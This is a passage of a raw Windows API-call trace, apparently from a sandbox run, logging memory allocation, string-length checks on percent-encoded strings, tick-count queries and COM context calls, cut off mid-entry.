[0101.125] GetTickCount () returned 0x210d44f [0101.125] memcpy (in: _Dst=0x24adf9ba1ae, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9ba1ae) returned 0x24adf9ba1ae [0101.126] memcpy (in: _Dst=0x24adf9ba1a8, _Src=0x24adf9bbcb8, _Size=0x6 | out: _Dst=0x24adf9ba1a8) returned 0x24adf9ba1a8 [0101.126] free (_Block=0x24ae1394be0) [0101.127] malloc (_Size=0x28) returned 0x24ae13947c0 [0101.127] GetTickCount () returned 0x210d44f [0101.127] malloc (_Size=0x28) returned 0x24ae13949a0 [0101.127] GetTickCount () returned 0x210d44f [0101.127] malloc (_Size=0x28) returned 0x24ae13949d0 [0101.127] GetTickCount () returned 0x210d44f [0101.128] malloc (_Size=0x28) returned 0x24ae1394cd0 [0101.128] GetTickCount () returned 0x210d45f [0101.128] malloc (_Size=0x28) returned 0x24ae13947f0 [0101.128] GetTickCount () returned 0x210d45f [0101.129] malloc (_Size=0x28) returned 0x24ae1394a00 [0101.129] GetTickCount () returned 0x210d45f [0101.129] memcpy (in: _Dst=0x24adf9ba064, _Src=0x24adf9b7ef8, _Size=0x2 | out: _Dst=0x24adf9ba064) returned 0x24adf9ba064 [0101.129] memcpy (in: _Dst=0x24adf9ba062, _Src=0x24adf9b7df8, _Size=0x2 | out: _Dst=0x24adf9ba062) returned 0x24adf9ba062 [0101.129] memcpy (in: _Dst=0x24adf9ba060, _Src=0x24adf9b7f38, _Size=0x2 | out: _Dst=0x24adf9ba060) returned 0x24adf9ba060 [0101.129] memcpy (in: _Dst=0x24adf9ba05e, _Src=0x24adf9b7bf8, _Size=0x2 | out: _Dst=0x24adf9ba05e) returned 0x24adf9ba05e [0101.129] memcpy (in: _Dst=0x24adf9ba05c, _Src=0x24adf9bbfb8, _Size=0x2 | out: _Dst=0x24adf9ba05c) returned 0x24adf9ba05c [0101.129] memcpy (in: _Dst=0x24adf9ba05a, _Src=0x24adf9bbe18, _Size=0x2 | out: _Dst=0x24adf9ba05a) returned 0x24adf9ba05a [0101.129] memcpy (in: _Dst=0x24adf9ba058, _Src=0x24adf9bbc78, _Size=0x2 | out: _Dst=0x24adf9ba058) returned 0x24adf9ba058 [0101.130] free (_Block=0x24ae1394a00) [0101.130] GetTickCount () returned 0x210d45f [0101.130] GetTickCount () returned 0x210d45f [0101.130] memcpy (in: _Dst=0x24adf9b7ed8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7ed8) returned 0x24adf9b7ed8 [0101.130] malloc (_Size=0x28) returned 0x24ae1394d90 [0101.131] GetTickCount () returned 0x210d45f [0101.131] memcpy (in: _Dst=0x24adf9b9f6c, _Src=0x24adf9b7ed8, _Size=0x4 | out: _Dst=0x24adf9b9f6c) returned 0x24adf9b9f6c [0101.131] memcpy (in: _Dst=0x24adf9b9f68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9f68) returned 0x24adf9b9f68 [0101.131] free (_Block=0x24ae1394d90) [0101.131] GetTickCount () returned 0x210d45f [0101.132] memcpy (in: _Dst=0x24adf9b7ff8, _Src=0x24adf9b9f6c, _Size=0x4 | out: _Dst=0x24adf9b7ff8) returned 0x24adf9b7ff8 [0101.132] malloc (_Size=0x28) returned 0x24ae1394d00 [0101.132] GetTickCount () returned 0x210d45f [0101.132] GetTickCount () returned 0x210d45f [0101.132] GetTickCount () returned 0x210d45f [0101.132] memcpy (in: _Dst=0x24adf9b7f18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7f18) returned 0x24adf9b7f18 [0101.132] malloc (_Size=0x28) returned 0x24ae1394700 [0101.132] GetTickCount () returned 0x210d45f [0101.133] memcpy (in: _Dst=0x24adf9ba2fc, _Src=0x24adf9b7f18, _Size=0x4 | out: _Dst=0x24adf9ba2fc) returned 0x24adf9ba2fc [0101.133] memcpy (in: _Dst=0x24adf9ba2f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba2f8) returned 0x24adf9ba2f8 [0101.133] free (_Block=0x24ae1394700) [0101.133] GetTickCount () returned 0x210d45f [0101.133] memcpy (in: _Dst=0x24adf9b8158, _Src=0x24adf9ba2fc, _Size=0x4 | out: _Dst=0x24adf9b8158) returned 0x24adf9b8158 [0101.133] malloc (_Size=0x28) returned 0x24ae1394820 [0101.133] GetTickCount () returned 0x210d45f [0101.133] malloc (_Size=0x28) returned 0x24ae1394d60 [0101.134] GetTickCount () returned 0x210d45f [0101.134] GetTickCount () returned 0x210d45f [0101.134] GetTickCount () returned 0x210d45f [0101.134] memcpy (in: _Dst=0x24adf9b7e98, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7e98) returned 0x24adf9b7e98 [0101.134] malloc (_Size=0x28) returned 0x24ae1394a00 [0101.134] GetTickCount () returned 0x210d45f [0101.134] memcpy (in: _Dst=0x24adf9ba1dc, _Src=0x24adf9b7e98, _Size=0x4 | out: _Dst=0x24adf9ba1dc) returned 0x24adf9ba1dc [0101.134] memcpy (in: _Dst=0x24adf9ba1d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba1d8) returned 0x24adf9ba1d8 [0101.134] free (_Block=0x24ae1394a00) [0101.134] GetTickCount () returned 0x210d45f [0101.134] memcpy (in: _Dst=0x24adf9b8018, _Src=0x24adf9ba1dc, _Size=0x4 | out: _Dst=0x24adf9b8018) returned 0x24adf9b8018 [0101.135] malloc (_Size=0x28) returned 0x24ae1394a00 [0101.135] GetTickCount () returned 0x210d45f [0101.135] malloc (_Size=0x28) returned 0x24ae1394a30 [0101.135] GetTickCount () returned 0x210d45f [0101.135] GetTickCount () returned 0x210d45f [0101.135] GetTickCount () returned 0x210d45f [0101.135] memcpy (in: _Dst=0x24adf9b7c18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7c18) returned 0x24adf9b7c18 [0101.135] malloc (_Size=0x28) returned 0x24ae1394a60 [0101.135] GetTickCount () returned 0x210d45f [0101.135] memcpy (in: _Dst=0x24adf9ba29c, _Src=0x24adf9b7c18, _Size=0x4 | out: _Dst=0x24adf9ba29c) returned 0x24adf9ba29c [0101.135] memcpy (in: _Dst=0x24adf9ba298, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba298) returned 0x24adf9ba298 [0101.136] free (_Block=0x24ae1394a60) [0101.136] GetTickCount () returned 0x210d45f [0101.136] memcpy (in: _Dst=0x24adf9b7db8, _Src=0x24adf9ba29c, _Size=0x4 | out: _Dst=0x24adf9b7db8) returned 0x24adf9b7db8 [0101.136] malloc (_Size=0x28) returned 0x24ae1394b50 [0101.136] GetTickCount () returned 0x210d45f [0101.136] malloc (_Size=0x28) returned 0x24ae1394d90 [0101.136] GetTickCount () returned 0x210d45f [0101.136] GetTickCount () returned 0x210d45f [0101.136] GetTickCount () returned 0x210d45f [0101.136] memcpy (in: _Dst=0x24adf9b7c58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7c58) returned 0x24adf9b7c58 [0101.137] malloc (_Size=0x28) returned 0x24ae1394dc0 [0101.137] GetTickCount () returned 0x210d45f [0101.137] memcpy (in: _Dst=0x24adf9b9e1c, _Src=0x24adf9b7c58, _Size=0x4 | out: _Dst=0x24adf9b9e1c) returned 0x24adf9b9e1c [0101.137] memcpy (in: _Dst=0x24adf9b9e18, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9e18) returned 0x24adf9b9e18 [0101.137] free (_Block=0x24ae1394dc0) [0101.137] GetTickCount () returned 0x210d45f [0101.138] memcpy (in: _Dst=0x24adf9b8038, _Src=0x24adf9b9e1c, _Size=0x4 | out: _Dst=0x24adf9b8038) returned 0x24adf9b8038 [0101.138] malloc (_Size=0x28) returned 0x24ae1394dc0 [0101.138] GetTickCount () returned 0x210d45f [0101.138] malloc (_Size=0x28) returned 0x24ae1394be0 [0101.138] GetTickCount () returned 0x210d45f [0101.138] GetTickCount () returned 0x210d45f [0101.138] GetTickCount () returned 0x210d45f [0101.138] memcpy (in: _Dst=0x24adf9b8118, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8118) returned 0x24adf9b8118 [0101.138] malloc (_Size=0x28) returned 0x24ae1394670 [0101.138] GetTickCount () returned 0x210d45f [0101.138] memcpy (in: _Dst=0x24adf9b9eac, _Src=0x24adf9b8118, _Size=0x4 | out: _Dst=0x24adf9b9eac) returned 0x24adf9b9eac [0101.138] memcpy (in: _Dst=0x24adf9b9ea8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9ea8) returned 0x24adf9b9ea8 [0101.139] free (_Block=0x24ae1394670) [0101.139] GetTickCount () returned 0x210d45f [0101.139] memcpy (in: _Dst=0x24adf9b7eb8, _Src=0x24adf9b9eac, _Size=0x4 | out: _Dst=0x24adf9b7eb8) returned 0x24adf9b7eb8 [0101.139] malloc (_Size=0x28) returned 0x24ae1394a60 [0101.139] GetTickCount () returned 0x210d45f [0101.139] malloc (_Size=0x28) returned 0x24ae1394670 [0101.139] GetTickCount () returned 0x210d45f [0101.139] GetTickCount () returned 0x210d45f [0101.139] GetTickCount () returned 0x210d45f [0101.139] memcpy (in: _Dst=0x24adf9b80f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b80f8) returned 0x24adf9b80f8 [0101.140] malloc (_Size=0x28) returned 0x24ae1394b80 [0101.140] GetTickCount () returned 0x210d45f [0101.140] memcpy (in: _Dst=0x24adf9b9cfc, _Src=0x24adf9b80f8, _Size=0x4 | out: _Dst=0x24adf9b9cfc) returned 0x24adf9b9cfc [0101.140] memcpy (in: _Dst=0x24adf9b9cf8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9cf8) returned 0x24adf9b9cf8 [0101.140] free (_Block=0x24ae1394b80) [0101.140] GetTickCount () returned 0x210d45f [0101.140] memcpy (in: _Dst=0x24adf9b8338, _Src=0x24adf9b9cfc, _Size=0x4 | out: _Dst=0x24adf9b8338) returned 0x24adf9b8338 [0101.140] malloc (_Size=0x28) returned 0x24ae1394b80 [0101.141] GetTickCount () returned 0x210d45f [0101.141] malloc (_Size=0x28) returned 0x24ae1394a90 [0101.141] GetTickCount () returned 0x210d45f [0101.141] memcpy (in: _Dst=0x24adf9acfee, _Src=0x24adf9b8338, _Size=0x4 | out: _Dst=0x24adf9acfee) returned 0x24adf9acfee [0101.141] memcpy (in: _Dst=0x24adf9acfec, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfec) returned 0x24adf9acfec [0101.141] memcpy (in: _Dst=0x24adf9acfe8, _Src=0x24adf9b7eb8, _Size=0x4 | out: _Dst=0x24adf9acfe8) returned 0x24adf9acfe8 [0101.141] memcpy (in: _Dst=0x24adf9acfe6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfe6) returned 0x24adf9acfe6 [0101.141] memcpy (in: _Dst=0x24adf9acfe2, _Src=0x24adf9b8038, _Size=0x4 | out: _Dst=0x24adf9acfe2) returned 0x24adf9acfe2 [0101.141] memcpy (in: _Dst=0x24adf9acfe0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfe0) returned 0x24adf9acfe0 [0101.141] memcpy (in: _Dst=0x24adf9acfdc, _Src=0x24adf9b7db8, _Size=0x4 | out: _Dst=0x24adf9acfdc) returned 0x24adf9acfdc [0101.141] memcpy (in: _Dst=0x24adf9acfda, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfda) returned 0x24adf9acfda [0101.141] memcpy (in: _Dst=0x24adf9acfd6, _Src=0x24adf9b8018, _Size=0x4 | out: _Dst=0x24adf9acfd6) returned 0x24adf9acfd6 [0101.141] memcpy (in: _Dst=0x24adf9acfd4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfd4) returned 0x24adf9acfd4 [0101.141] memcpy (in: _Dst=0x24adf9acfd0, _Src=0x24adf9b8158, _Size=0x4 | out: _Dst=0x24adf9acfd0) returned 0x24adf9acfd0 [0101.141] memcpy (in: _Dst=0x24adf9acfce, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfce) returned 0x24adf9acfce [0101.141] memcpy (in: _Dst=0x24adf9acfca, _Src=0x24adf9b7ff8, _Size=0x4 | out: _Dst=0x24adf9acfca) returned 0x24adf9acfca [0101.141] memcpy (in: _Dst=0x24adf9acfc8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acfc8) returned 0x24adf9acfc8 [0101.142] free (_Block=0x24ae1394a90) [0101.142] SysStringLen (param_1="%c3%94%c2%b4%3d%c3%ae") returned 0x15 [0101.142] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0101.143] GetTickCount () returned 0x210d45f [0101.143] memcpy (in: _Dst=0x24adf9ba2c8, _Src=0x24ae13ae5e0, _Size=0x8 | out: _Dst=0x24adf9ba2c8) returned 0x24adf9ba2c8 [0101.143] free (_Block=0x24ae13ae5e0) [0101.143] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ô", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.143] malloc (_Size=0x70) returned 0x24ae146fd20 [0101.143] GetTickCount () returned 0x210d45f [0101.144] GetTickCount () returned 0x210d46e [0101.144] GetTickCount () returned 0x210d46e [0101.144] GetTickCount () returned 0x210d46e [0101.144] memcpy (in: _Dst=0x24ae1a7d140, _Src=0x24adfc6ee30, _Size=0x18 | out: _Dst=0x24ae1a7d140) returned 0x24ae1a7d140 [0101.145] GetTickCount () returned 0x210d46e [0101.145] memcpy (in: _Dst=0x24adf9b82b8, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9b82b8) returned 0x24adf9b82b8 [0101.145] malloc (_Size=0x28) returned 0x24ae1394700 [0101.146] GetTickCount () returned 0x210d46e [0101.146] memcpy (in: _Dst=0x24adf9b9f9a, _Src=0x24ae1a0f6e4, _Size=0xe | out: _Dst=0x24adf9b9f9a) returned 0x24adf9b9f9a [0101.146] memcpy (in: _Dst=0x24adf9b9f98, _Src=0x24adf9b82b8, _Size=0x2 | out: _Dst=0x24adf9b9f98) returned 0x24adf9b9f98 [0101.147] free (_Block=0x24ae1394700) [0101.147] GetTickCount () returned 0x210d46e [0101.147] GetTickCount () returned 0x210d46e [0101.147] GetTickCount () returned 0x210d46e [0101.147] GetTickCount () returned 0x210d46e [0101.148] GetTickCount () returned 0x210d46e [0101.148] GetTickCount () returned 0x210d46e [0101.149] GetTickCount () returned 0x210d46e [0101.149] GetTickCount () returned 0x210d46e [0101.149] malloc (_Size=0x28) returned 0x24ae1394700 [0101.149] GetTickCount () returned 0x210d46e [0101.149] GetTickCount () returned 0x210d46e [0101.150] GetTickCount () returned 0x210d46e [0101.150] malloc (_Size=0x28) returned 0x24ae1394a90 [0101.150] GetTickCount () returned 0x210d46e [0101.151] GetTickCount () returned 0x210d46e [0101.151] GetTickCount () returned 0x210d46e [0101.151] GetTickCount () returned 0x210d46e [0101.152] GetTickCount () returned 0x210d46e [0101.152] malloc (_Size=0x28) returned 0x24ae1394730 [0101.153] GetTickCount () returned 0x210d46e [0101.153] GetTickCount () returned 0x210d46e [0101.153] malloc (_Size=0x28) returned 0x24ae1484870 [0101.153] GetTickCount () returned 0x210d46e [0101.153] malloc (_Size=0x28) returned 0x24ae1484d20 [0101.153] GetTickCount () returned 0x210d46e [0101.154] malloc (_Size=0x28) returned 0x24ae1484810 [0101.154] GetTickCount () returned 0x210d46e [0101.154] free (_Block=0x24ae1484810) [0101.155] GetTickCount () returned 0x210d46e [0101.155] GetTickCount () returned 0x210d46e [0101.155] malloc (_Size=0x28) returned 0x24ae14848a0 [0101.155] GetTickCount () returned 0x210d46e [0101.156] free (_Block=0x24ae14848a0) [0101.156] GetTickCount () returned 0x210d46e [0101.156] malloc (_Size=0x28) returned 0x24ae1484d80 [0101.156] GetTickCount () returned 0x210d46e [0101.156] GetTickCount () returned 0x210d46e [0101.156] GetTickCount () returned 0x210d46e [0101.156] malloc (_Size=0x28) returned 0x24ae1484c60 [0101.157] GetTickCount () returned 0x210d46e [0101.157] free (_Block=0x24ae1484c60) [0101.157] GetTickCount () returned 0x210d46e [0101.157] malloc (_Size=0x28) returned 0x24ae1484e40 [0101.158] GetTickCount () returned 0x210d46e [0101.158] malloc (_Size=0x28) returned 0x24ae1484f00 [0101.158] GetTickCount () returned 0x210d46e [0101.158] GetTickCount () returned 0x210d46e [0101.158] GetTickCount () returned 0x210d46e [0101.158] malloc (_Size=0x28) returned 0x24ae1484c90 [0101.158] GetTickCount () returned 0x210d46e [0101.159] free (_Block=0x24ae1484c90) [0101.171] GetTickCount () returned 0x210d47e [0101.171] SysStringLen (param_1="%c2%8e%c2%a1%3e%c3%89") returned 0x15 [0101.171] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0101.172] GetTickCount () returned 0x210d47e [0101.172] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8e", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.172] GetTickCount () returned 0x210d47e [0101.172] SysStringLen (param_1="%50%42%67%52") returned 0xc [0101.172] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0101.173] GetTickCount () returned 0x210d47e [0101.173] GetTickCount () returned 0x210d47e [0101.173] SysStringLen (param_1="%30%7c%31%7c") returned 0xc [0101.173] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0101.173] GetTickCount () returned 0x210d47e [0101.174] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.174] GetTickCount () returned 0x210d48d [0101.175] SysStringLen (param_1="%67%41%51%5a") returned 0xc [0101.175] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0101.175] GetTickCount () returned 0x210d48d [0101.175] GetTickCount () returned 0x210d48d [0101.175] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0101.176] free (_Block=0x24ae13ae860) [0101.176] free (_Block=0x24ae13aed70) [0101.177] free (_Block=0x24ae1484c00) [0101.177] free (_Block=0x24ae1484bd0) [0101.177] free (_Block=0x24ae1484b10) [0101.177] free (_Block=0x24ae14847b0) [0101.178] free (_Block=0x24ae1484ab0) [0101.178] free (_Block=0x24ae1484a80) [0101.178] free (_Block=0x24ae1484930) [0101.179] free (_Block=0x24ae1484d50) [0101.179] free (_Block=0x24ae1484ed0) [0101.179] free (_Block=0x24ae14848a0) [0101.179] free (_Block=0x24ae1484c30) [0101.179] free (_Block=0x24ae1484a20) [0101.180] free (_Block=0x24ae1484e10) [0101.180] free (_Block=0x24ae14847e0) [0101.180] free (_Block=0x24ae14849c0) [0101.180] free (_Block=0x24ae1484ea0) [0101.180] free (_Block=0x24ae1484de0) [0101.181] free (_Block=0x24ae1484990) [0101.181] free (_Block=0x24ae14849f0) [0101.181] free (_Block=0x24ae1484e70) [0101.181] free (_Block=0x24ae1484780) [0101.182] free (_Block=0x24ae1484cc0) [0101.182] free (_Block=0x24ae1484960) [0101.182] free (_Block=0x24ae1484db0) [0101.183] free (_Block=0x24ae1484840) [0101.183] free (_Block=0x24ae1484b70) [0101.183] free (_Block=0x24ae1484cf0) [0101.184] free (_Block=0x24ae1484b40) [0101.184] free (_Block=0x24ae1484900) [0101.184] free (_Block=0x24ae1484ba0) [0101.184] free (_Block=0x24ae1484ae0) [0101.184] free (_Block=0x24ae14848d0) [0101.184] free (_Block=0x24ae1484a50) [0101.185] free (_Block=0x24ae1484c60) [0101.185] free (_Block=0x24ae1484810) [0101.186] free (_Block=0x24ae1484f00) [0101.186] free (_Block=0x24ae1484e40) [0101.187] free (_Block=0x24ae1484d80) [0101.187] free (_Block=0x24ae1484d20) [0101.188] free (_Block=0x24ae1484870) [0101.188] free (_Block=0x24ae1394730) [0101.189] free (_Block=0x24ae1394a90) [0101.189] free (_Block=0x24ae1394700) [0101.190] free (_Block=0x24ae1394b80) [0101.191] free (_Block=0x24ae1394670) [0101.192] free (_Block=0x24ae1394a60) [0101.192] free (_Block=0x24ae1394be0) [0101.193] free (_Block=0x24ae1394dc0) [0101.194] free (_Block=0x24ae1394d90) [0101.194] free (_Block=0x24ae1394b50) [0101.195] free (_Block=0x24ae1394a30) [0101.195] free (_Block=0x24ae1394a00) [0101.196] free (_Block=0x24ae1394d60) [0101.196] free (_Block=0x24ae1394820) [0101.197] free (_Block=0x24ae1394d00) [0101.197] free (_Block=0x24ae13947f0) [0101.198] free (_Block=0x24ae1394cd0) [0101.199] free (_Block=0x24ae13949d0) [0101.199] free (_Block=0x24ae13949a0) [0101.200] free (_Block=0x24ae13947c0) [0101.200] free (_Block=0x24ae1394c70) [0101.200] free (_Block=0x24ae1394b20) [0101.201] free (_Block=0x24ae1394940) [0101.202] free (_Block=0x24ae1394df0) [0101.202] free (_Block=0x24ae1394af0) [0101.203] free (_Block=0x24ae1394910) [0101.203] free (_Block=0x24ae1394ca0) [0101.204] free (_Block=0x24ae13946d0) [0101.204] free (_Block=0x24ae13948e0) [0101.205] free (_Block=0x24ae1394d30) [0101.206] free (_Block=0x24ae1394970) [0101.207] free (_Block=0x24ae1394ac0) [0101.208] free (_Block=0x24ae1394790) [0101.209] free (_Block=0x24ae1394c40) [0101.210] free (_Block=0x24ae1394c10) [0101.211] free (_Block=0x24ae13948b0) [0101.212] free (_Block=0x24ae1394880) [0101.212] free (_Block=0x24ae1394bb0) [0101.213] free (_Block=0x24ae13946a0) [0101.213] free (_Block=0x24ae1394850) [0101.213] free (_Block=0x24ae1394760) [0101.214] free (_Block=0x24ae14808c0) [0101.214] free (_Block=0x24ae1480890) [0101.215] free (_Block=0x24ae1480980) [0101.216] free (_Block=0x24ae1480aa0) [0101.216] free (_Block=0x24ae1480a70) [0101.217] free (_Block=0x24ae1480950) [0101.217] free (_Block=0x24ae1480a10) [0101.218] free (_Block=0x24ae1480830) [0101.218] free (_Block=0x24ae1480860) [0101.220] MulDiv (nNumber=1010, nNumerator=100, nDenominator=2000) returned 51 [0101.220] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.220] GetTickCount () returned 0x210d4ad [0101.220] SysStringLen (param_1="%c2%88%7a%c3%91%c2%93") returned 0x15 [0101.220] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0101.221] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x88", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.221] SysStringLen (param_1="%48%6f%6e%65") returned 0xc [0101.221] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0101.223] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¿", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.224] SysStringLen (param_1="%c2%9a%c2%b6%2d%5b") returned 0x12 [0101.224] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0101.224] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.225] SysStringLen (param_1="%c2%a6%55%c3%b3%c2%b5") returned 0x15 [0101.225] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0101.227] SysStringLen (param_1="%c2%8d%c2%83%05%49") returned 0x12 [0101.227] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0101.228] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.229] SysStringLen (param_1="%6f%70%68%69") returned 0xc [0101.229] SysStringLen (param_1="%c2%91%c3%b0%49%59") returned 0x12 [0101.229] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x91", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.229] GetTickCount () returned 0x210d4bc [0101.229] SysStringLen (param_1="%76%69%61%62") returned 0xc [0101.229] GetTickCount () returned 0x210d4bc [0101.229] SysStringLen (param_1="%c2%be%c2%98%c2%8e%3b") returned 0x15 [0101.230] GetTickCount () returned 0x210d4bc [0101.230] SysStringLen (param_1="%0b%71%c3%ac%c3%a6") returned 0x12 [0101.230] GetTickCount () returned 0x210d4bc [0101.230] SysStringLen (param_1="%75%41%51%65") returned 0xc [0101.231] GetTickCount () returned 0x210d4bc [0101.231] SysStringLen (param_1="%60%c3%a8%c3%93%58") returned 0x12 [0101.231] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x97", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.231] GetTickCount () returned 0x210d4bc [0101.232] SysStringLen (param_1="%4f%c3%b4%c3%ac%c2%90") returned 0x15 [0101.232] GetTickCount () returned 0x210d4bc [0101.232] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0101.233] MulDiv (nNumber=1002, nNumerator=100, nDenominator=2018) returned 50 [0101.233] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.233] GetTickCount () returned 0x210d4bc [0101.233] SysStringLen (param_1="%41%41%43%41") returned 0xc [0101.234] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.234] SysStringLen (param_1="%6a%42%51%59") returned 0xc [0101.235] SysStringLen (param_1="%c3%ba%0c%c3%84%2f") returned 0x12 [0101.235] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ú", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.235] SysStringLen (param_1="%30%7c%35%7c") returned 0xc [0101.235] SysStringLen (param_1="%52%73%67%63") returned 0xc [0101.235] SysStringLen (param_1="%75%41%77%4e") returned 0xc [0101.236] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¬", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.236] SysStringLen (param_1="%41%73%48%41") returned 0xc [0101.236] SysStringLen (param_1="%45%34%c2%a8%c2%b2%2b%c3%bf%5d%0a%c3%ad%c2%8c") returned 0x2d [0101.236] GetTickCount () returned 0x210d4bc [0101.237] SysStringLen (param_1="%6f%42%41%4c") returned 0xc [0101.238] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.238] GetTickCount () returned 0x210d4cc [0101.238] SysStringLen (param_1="%c2%99%7b%c2%a6%1a") returned 0x12 [0101.238] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x99", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.238] GetTickCount () returned 0x210d4cc [0101.238] SysStringLen (param_1="%6c%42%51%62") returned 0xc [0101.239] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.239] GetTickCount () returned 0x210d4cc [0101.239] SysStringLen (param_1="%0a%16%c2%a8%62") returned 0xf [0101.241] GetTickCount () returned 0x210d4cc [0101.241] SysStringLen (param_1="%c3%bc%c2%ad%0d%c3%84") returned 0x15 [0101.241] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.241] GetTickCount () returned 0x210d4cc [0101.241] SysStringLen (param_1="%4e%26%2c%c2%b7") returned 0xf [0101.242] GetTickCount () returned 0x210d4cc [0101.242] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0101.243] MulDiv (nNumber=1021, nNumerator=100, nDenominator=2047) returned 50 [0101.243] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.244] GetTickCount () returned 0x210d4cc [0101.244] GetTickCount () returned 0x210d4cc [0101.244] SysStringLen (param_1="%4c%65%63%69") returned 0xc [0101.244] SysStringLen (param_1="%c3%9b%51%74%44") returned 0xf [0101.244] SysStringLen (param_1="%6c%76%6c%6a") returned 0xc [0101.245] SysStringLen (param_1="%c2%a8%c2%b5%2d%69") returned 0x12 [0101.245] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¨", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.245] SysStringLen (param_1="%76%c3%9e%03%16%4d%21%c2%a5%2a%c2%b7%c3%8b%6f") returned 0x2d [0101.245] GetStringTypeW (in: dwInfoType=0x1, 